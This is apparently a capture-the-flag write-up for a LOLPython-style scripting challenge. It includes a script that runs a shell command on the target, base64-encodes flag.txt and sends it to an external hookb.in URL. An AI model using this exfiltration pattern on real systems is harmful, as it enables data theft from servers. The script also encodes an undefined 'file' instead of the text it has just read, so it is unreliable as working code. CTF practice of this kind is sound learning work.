Tags: scripting 

Rating:

Similar to LOLD2, but now every time you pass your lol script to nc session you would only get a static response back, no real feedback.
I was stuck on this challenge for a bit but then I thought about using a web request as a data exfiltration tool. Took me a few minutes to come up with the correct syntax but finally I was able to put this together.

Basically, we are going to read the flag.txt and create a new file called out.txt with the flag inside it. Then we are going to encode the text in out.txt with base64 and make a web request to hookbin where I can monitor the incoming requests and see the base64 encoded data come in. After that I use Cyberchef to decode the data and get the flag.

**import os** - was used so that I can send system command.

**import urllib2** - was used so that I can make web requests to a website like '**hookbin**' where I can monitor all incoming requests, basically I was exfiltration base64 encoded data to a hookbin website. I was able to then review the data and decode it using **Cyberchef**.

**import base64** - was used to encode text so that I can make clean web requests.

```
GIMME os
GIMME urllib2
GIMME base64

cmd CAN HAS 'cat flag.txt > out.txt'

os OWN system WIT cmd

RF CAN HAS open WIT 'out.txt'!
RR CAN HAS RF OWN read THING

MB CAN HAS file OWN read THING OWN encode WIT 'ascii'!
B64 CAN HAS base64 OWN b64encode WIT MB

urllib2 OWN urlopen WIT 'https://hookb.in/oXkRWwzQ0bhBnPZZXM8y?flag=' ALONG WITH B64!
```